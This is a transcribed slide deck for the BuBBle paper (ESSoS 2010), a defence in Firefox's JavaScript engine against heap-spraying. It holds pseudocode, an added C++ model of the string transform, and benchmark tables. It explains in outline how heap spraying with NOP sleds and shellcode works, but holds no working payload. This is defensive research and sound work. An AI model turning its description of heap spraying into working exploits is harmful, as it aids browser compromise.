BuBBle: a Javascript engine level countermeasure against heap-spraying attacks Paper accepted and presented @ ESSoS 2010 Pisa (Italy) 3-4-5 February 2010
BuBBle: a Javascript countermeasure against heap-spraying attacks
Francesco Gadaleta - Yves Younan - Wouter Joosen
Katholieke Universiteit Leuven
ESSoS 2010
Pisa, 3-4 Feb.
Overview
‣ Heap-spraying attacks
‣ BuBBle approach
‣ Experiments and Results
‣ Conclusion
A new target: web browsers
Firefox vulnerabilities (http://www.mozilla.org/security/known-vulnerabilities/firefox35.html)
Integer overflow
Memory corruption
Heap buffer overflow in string to number conversion
Crash and remote code execution (Flash player unloading)
Problem description: the art of spraying the heap
[Figure: the sprayed heap, filled with many identical blocks, each a long NOP sled (0x90 0x90 0x90 ...) followed by SHELLCODE]
Heap-spraying attacks
Assumptions
A buffer overflow/memory corruption vulnerability
Users allowed to allocate memory
Homogeneity of memory
BuBBle approach: Tracemonkey internals
Homogeneity of memory -> monolithic data structure
• Javascript Strings
BuBBle approach: the JSString type (Tracemonkey - Mozilla Firefox 3.7)
[Figure: a JSString holds mLength and mChars; mChars points to one contiguous array of characters, so a sprayed string is a contiguous block of 0x90 0x90 0x90 ... followed by SHELLCODE]
BuBBle approach
• Introduce diversity in contiguous blocks of memory
• transform Javascript strings (internal structure)
[Animation: the string "Hi. I am a dangerous string to jump into a shellcode" is passed through Transform at <Define string> and through Restore at <Use string>; the bytes changed by Transform are recorded in a <support data structure>]
BuBBle approach: support data
• Interrupt array of characters
• Change characters at random positions: how many?
• Save support data
Support data layout: Num. intervals | Pos. 1st char | Value 1st char | Pos. 2nd char | Value 2nd char | ...
rand <- generate_random_position(0, MINLEN)
len <- string.length()
intervals <- len/MINLEN
foreach (i in intervals)
    pos = MINLEN*i
    save_position(pos+rand)
    save_value(character[pos+rand])
    change_value(character[pos+rand])
BuBBle approach: js_Transform()
128
Original: “blah blah blah is a normal string with appended shellcode”
len = 57
intervals = 2
rand = 7
Support data: 2 intervals; (pos 7, value 'a'), (pos 35, value 'w')
Transformed: “blah bl0xCCh blah is a normal string 0xCCith appended shellcode”
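The transform/restore step and its support data, as an added stand-alone model in C++ (not Tracemonkey's or the authors' code): MINLEN is assumed to be 27 so that rand = 7 reproduces the slide's two changed characters, the 0xCC interrupt byte follows the security-evaluation slide, and a NOP-sled check measures the longest run of identical bytes that survives a transform.

```cpp
// Added example: stand-alone model of BuBBle's js_Transform()/js_Restore()
// after the slide pseudocode. Not Tracemonkey code. Assumptions: MINLEN = 27
// (chosen so rand = 7 hits the slide's 'a' and 'w'), 0xCC (int3) as the
// interrupt byte, and the support-data layout shown in the deck.
#include <cstddef>
#include <iostream>
#include <random>
#include <string>
#include <vector>

constexpr std::size_t MINLEN = 27;   // interval length between changed bytes
constexpr char INTERRUPT = '\xCC';   // int3: execution traps instead of sliding

// Support data saved next to the string: number of intervals and, per
// interval, the position and original value of the byte that was changed.
struct SupportData {
    std::size_t intervals = 0;
    std::vector<std::size_t> pos;
    std::vector<char> value;
};

// js_Transform: one random offset, then overwrite the byte at that offset
// inside every MINLEN-long interval, remembering what was there.
// Strings shorter than MINLEN give intervals = 0 and stay untouched
// (what the slide's len/MINLEN implies; an assumption here).
SupportData js_Transform(std::string& chars, std::size_t rand) {
    SupportData sd;
    sd.intervals = chars.size() / MINLEN;          // intervals <- len/MINLEN
    for (std::size_t i = 0; i < sd.intervals; ++i) {
        std::size_t p = MINLEN * i + rand;           // pos + rand
        sd.pos.push_back(p);                         // save_position
        sd.value.push_back(chars[p]);                // save_value
        chars[p] = INTERRUPT;                        // change_value
    }
    return sd;
}

// js_Restore: put the saved bytes back before script code uses the string.
void js_Restore(std::string& chars, const SupportData& sd) {
    for (std::size_t i = 0; i < sd.intervals; ++i)
        chars[sd.pos[i]] = sd.value[i];
}

// rand <- generate_random_position(0, MINLEN)
std::size_t generate_random_position() {
    static std::mt19937 gen{std::random_device{}()};
    std::uniform_int_distribution<std::size_t> dist(0, MINLEN - 1);
    return dist(gen);
}

// Longest run of one byte value: a NOP sled needs a long run of 0x90 to be
// useful, so this is the quantity the transform is meant to bound.
std::size_t longest_run(const std::string& s, char b) {
    std::size_t best = 0, cur = 0;
    for (char c : s) {
        cur = (c == b) ? cur + 1 : 0;
        if (cur > best) best = cur;
    }
    return best;
}

// Size of the support data as the memory-overhead slide counts it:
// one position byte and one value byte per interval (2i bytes).
std::size_t support_bytes(const SupportData& sd) { return 2 * sd.intervals; }

int main() {
    // Constructed sample taken from the js_Transform() slide.
    std::string s = "blah blah blah is a normal string with appended shellcode";
    SupportData sd = js_Transform(s, 7);
    std::cout << "intervals=" << sd.intervals
              << " support=" << support_bytes(sd) << " bytes\n";
    js_Restore(s, sd);

    // Constructed NOP sled: 200 bytes of 0x90, transformed at a random offset.
    std::string sled(200, '\x90');
    SupportData sd2 = js_Transform(sled, generate_random_position());
    std::cout << "longest 0x90 run after transform: "
              << longest_run(sled, '\x90') << "\n";
    return 0;
}
```

With this interval scheme the run of untouched bytes after the last change can approach 2*MINLEN when rand is small, which is why the test bounds the surviving sled at that value rather than at MINLEN.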
BuBBle approach: security evaluation
• What? We still spray the heap!
• Interrupt procedure call (.byte 0xcc)
• IE and Aurora against Google (Jan 2010)
Aurora-Google (1-0)
BuBBle: performance benchmarks
• Macrobenchmarks
• Sunspider Benchmark Suite
• V8
• PeaceKeeper bench.
• Memory overhead analysis

Sunspider Javascript Benchmark Suite
Test            Perf. overhead
3d              0.17%
bitops          0.89%
controlflow     1.44%
math            0.62%
regexp          0.23%
string base64   27.3%
fasta           1.24%
tagcloud        2.20%
unpack          3.24%
validate        9.30%
Average         5.19%

Peacekeeper Javascript Benchmarks
Benchmark          Perf. overhead
Rendering          0.5%
Social Networking  0.5%
Complex Graphics   2.2%
Data               14%
DOM ops.           0.2%
Text parsing       2.0%
Total              2.8%

Macrobenchmarks
Site URL          Perf. overhead
economist.com     5.6%
amazon.com        4.7%
ebay.com          4.2%
facebook.com      4.9%
maps.google.com   3.2%
docs.google.com   6.3%
cnn.com           4.8%
youtube.com       4.9%
Average           4.8%

V8 Javascript Benchmarks
Benchmark     Perf. overhead
Richards      5.6%
DeltaBlue     3.6%
Crypto        10%
Ray Trace     1.5%
Early Boyer   3.7%
RegExp        0.6%
Splay         1.8%
Total         2.6%
BuBBle: memory overhead
• 1/24 changes
• n-byte original string
• i = n/24
• support data structure 2i bytes long
• 2i/n = 2/24 ≈ 8.3% memory overhead (theoretical, and room for improvement)
Memory overhead analysis from proc file system
Benchmark    Mem. overhead
Sunspider    5.6%
V8           4.2%
Peacekeeper  6.5%
Average      5.3%
Related work
• ASLR
  Bhatkar, S., Duvarney, D.C., Sekar, R.: Address obfuscation: an efficient approach to combat a broad range of memory error exploits. In: Proceedings of the 12th USENIX Security Symposium, Washington, D.C., USA, August 2003
• DEP
  Data Execution Prevention: Windows Server 2003 with SP1
• Nozzle
  Ratanaworabhan, P., Livshits, B., Zorn, B.: Nozzle: a defense against heap-spraying code injection attacks. Technical report, Microsoft Research (November 2008)
• Shellcode detection
  Egele, M., Wurzinger, P., Kruegel, C., Kirda, E.: Defending browsers against drive-by downloads: mitigating heap-spraying code injection attacks. In: Flegel, U., Bruschi, D. (eds.) Detection of Intrusions and Malware, and Vulnerability Assessment. LNCS, vol. 5587, pp. 88-106. Springer, Heidelberg (2009)
Conclusion
• Lightweight solution (e.g. Mozilla Firefox, Mozilla Fennec)
• Implemented for Javascript strings
• Allocation of malicious objects from external media (mp3, ...)
• Future dev: protect arrays of integers, protect other engines
• Not just for browsers